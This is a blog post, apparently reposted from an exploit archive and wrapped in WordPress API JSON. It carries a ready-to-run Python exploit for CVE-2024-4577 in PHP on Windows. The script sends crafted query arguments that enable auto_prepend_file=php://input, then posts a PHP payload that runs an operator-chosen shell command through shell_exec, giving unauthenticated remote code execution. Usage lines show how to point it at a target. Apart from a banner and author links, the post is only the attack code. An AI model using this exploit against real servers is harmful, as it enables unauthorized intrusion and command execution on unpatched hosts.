{"id":57504,"date":"2024-06-14T18:59:34","date_gmt":"2024-06-14T15:59:34","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179085\/php83-exec.txt"},"modified":"2024-06-14T18:59:34","modified_gmt":"2024-06-14T15:59:34","slug":"php-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/php-remote-code-execution\/","title":{"rendered":"PHP Remote Code Execution"},"content":{"rendered":"<p># Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)<br \/># Exploit Author: Yesith Alvarez<br \/># Vendor Homepage: https:\/\/www.php.net\/downloads.php<br \/># Version: PHP 8.3.* &lt; 8.3.8, 8.2.* &lt; 8.2.20, 8.1.* &lt; 8.1.29<br \/># CVE : CVE-2024-4577<\/p>\n<p>from requests import Request, Session<br \/>import sys<br \/>import json<\/p>\n<p>def title():<br \/>print(&#8221;&#8217;<\/p>\n<p>_______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______ <br \/>\/ ____\\ \\ \/ \/ ____| |__ \\ \/ _ \\__ \\| || | | || | | ____|____ |____ |<br \/>| | \\ \\ \/ \/| |__ ______ ) | | | | ) | || |_ ______| || |_| |__ \/ \/ \/ \/ <br \/>| | \\ \\\/ \/ | __|______\/ \/| | | |\/ \/|__ _|______|__ _|___ \\ \/ \/ \/ \/ <br \/>| |____ \\ \/ | |____ \/ \/_| |_| \/ \/_ | | | | ___) | \/ \/ \/ \/ <br \/>\\_____| \\\/ |______| |____|\\___\/____| |_| |_| |____\/ \/_\/ \/_\/ <\/p>\n<p>Author: Yesith Alvarez<br \/>Github: https:\/\/github.com\/yealvarez<br \/>Linkedin: https:\/\/www.linkedin.com\/in\/pentester-ethicalhacker\/<br \/>Code improvements: https:\/\/github.com\/yealvarez\/CVE\/blob\/main\/CVE-2024-4577\/exploit.py<br \/>&#8221;&#8217;) <\/p>\n<p>def exploit(url, command): <br \/>payloads = {<br \/>&#8216;&lt;?php echo &#8220;vulnerable&#8221;; ?&gt;&#8217;,<br \/>&#8216;&lt;?php echo shell_exec(&#8220;&#8216;+command+'&#8221;); ?&gt;&#8217; <br \/>} <br \/>headers = {<br \/>&#8216;User-Agent&#8217;: &#8216;Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko\/20100101 Firefox\/123.0&#8217;,<br \/>&#8216;Content-Type&#8217;: 
&#8216;application\/x-www-form-urlencoded&#8217;}<br \/>s = Session()<br \/>for payload in payloads:<br \/>url = url + &#8220;\/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp:\/\/input&#8221;<br \/>req = Request(&#8216;POST&#8217;, url, data=payload, headers=headers)<br \/>prepped = req.prepare()<br \/>del prepped.headers[&#8216;Content-Type&#8217;]resp = s.send(prepped,<br \/>verify=False,<br \/>timeout=15)<br \/>#print(prepped.headers)<br \/>#print(url)<br \/>#print(resp.headers) <br \/>#print(payload)<br \/>print(resp.status_code)<br \/>print(resp.text)<\/p>\n<p>if __name__ == &#8216;__main__&#8217;:<br \/>title()<br \/>if(len(sys.argv) &lt; 2):<br \/>print(&#8216;[+] USAGE: python3 %s https:\/\/&lt;target_url&gt; &lt;command&gt;\\n&#8217;%(sys.argv[0]))<br \/>print(&#8216;[+] USAGE: python3 %s https:\/\/192.168.0.10\\n dir&#8217;%(sys.argv[0])) <br \/>exit(0)<br \/>else:<br \/>exploit(sys.argv[1],sys.argv[2])<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https:\/\/www.php.net\/downloads.php# Version: PHP 8.3,* &lt; 8.3.8, 8.2.*&lt;8.2.20, 8.1.*, 8.1.29# CVE : CVE-2024-4577 from requests import Request, Sessionimport sysimport json def title():print(&#8221;&#8217; _______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______ \/ ____\\ \\ \/ \/ ____| |__ 
&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57504","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57504","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57504"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57504\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57504"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57504"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57504"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}